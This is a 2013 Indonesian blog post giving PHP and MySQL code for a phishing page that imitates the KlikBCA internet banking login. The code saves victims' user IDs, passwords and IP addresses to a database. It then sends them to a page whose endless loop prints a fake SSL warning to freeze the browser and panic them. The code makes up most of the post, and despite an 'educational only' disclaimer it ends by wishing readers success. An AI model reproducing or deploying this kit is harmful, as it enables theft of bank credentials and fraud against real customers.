Arvan Septiandii

Laki-laki

Bali, Indonesia

Banggalah pada dirimu sendiri, Meski ada yang tak Menyukai. Kadang mereka membenci karena Mereka tak mampu menjadi seperti dirimu.
::
Start
Arvan Septiandii
Shutdown

Navbar3

Cari Blog Ini

Selasa, 12 Februari 2013

Phishing Attack: Login Overflow

Phishing!! Yeah, pasti sudah tahu kan apa artinya phishing?
Kalau belum tahu silahkan check it http://en.wikipedia.org/wiki/Phishing
Saya akan berbagi coding sederhana php dan database mysql dalam proses overflow. Data Korban akan di simpan ke dalam database, jadi sebelumnya kalian harus membuat database yang sesuai dengan Login Phishing.
DFD Phishing

Ketika korban terjebak dengan login phishing, web browser korban akan crash dan CPU Range Korban menjadi 100%.

Sebagai contoh saya akan demonstrasi phishing pada KLIKBCA
bca

Membuat 3c.php
<?php
include “koneksi.php”;
$User = $_POST['UserId'];
$passwd = $_POST['passwd'];
$ip = getenv(REMOTE_ADDR);
$tgl = date(“j F Y, g:i a”);
$query = “INSERT INTO hack (user, passwd, ip, tgl) VALUES (‘$User’, ‘$passwd’, ‘$ip’, ‘$tgl’)”;
mysqli_query($konek, $query); // kirim query ke database
$hasil = mysqli_affected_rows($konek); // cek perubahan data di database
// login.php adalah URL Direct letak overflow
if ($hasil > 0)
{
header(‘location:../login.php’ );
}
else
{
echo “gagal”;
}
?>

Membuat koneksi.php
<?php
$database = “bca”; // nama database
$host = “localhost”; // nama host
$nama = “root”; // username database
$pass = “haning”; // password database
$konek = mysqli_connect($host, $nama, $pass, $database); // konek ke database
if(mysqli_connect_errno())
{
echo “Koneksi Ke Server Gagal.”;
exit();
}
?>

Tempat berlangsungnya overflow, saya namakan login.php
<?php
mysql_connect (“localhost”, “root”,”haning”) or die (mysql_error());
mysql_select_db (“bca”) or die(mysql_error());
$over = $_POST['login']; // button submit “login”
$sql = mysql_query(” select * from hack where user like ‘%$over%’ “);
$row = mysql_fetch_array($sql);
// Proses Oveflow, lebih tepatnya Perulangan Pencarian
if ($row > 0)
{
while ($row){
echo “At “.$row['tgl'].” Secure Socket SSL Invalid. Please, do not process access to BCA Internet Banking.<br>”;
}
}
else
{
echo “overflow gagal”;
}
?>
Tujuan di balik phishing ini adalah mencuri informasi korban di balik login palsu dan membuat panik korban. Ketika korban panik, maka ia akan menutup login tersebut dan sang Attacker mendapatkan user login korban di dalam database yang telah disiapkan sebelumnya.
Simak VIDEO nya Disini:

Untuk Download Video Demonstrasi Klik DISINI
Artikel ini hanya semata-mata untuk pembelajaran, penulis tidak bertanggung jawab sama sekali atas tindakan diluar artikel ini. Gunakan artikel ini sebagai pembelajaran dan memproteksi diri.
Selamat mencoba & semoga berhasil,

Tidak ada komentar:

Posting Komentar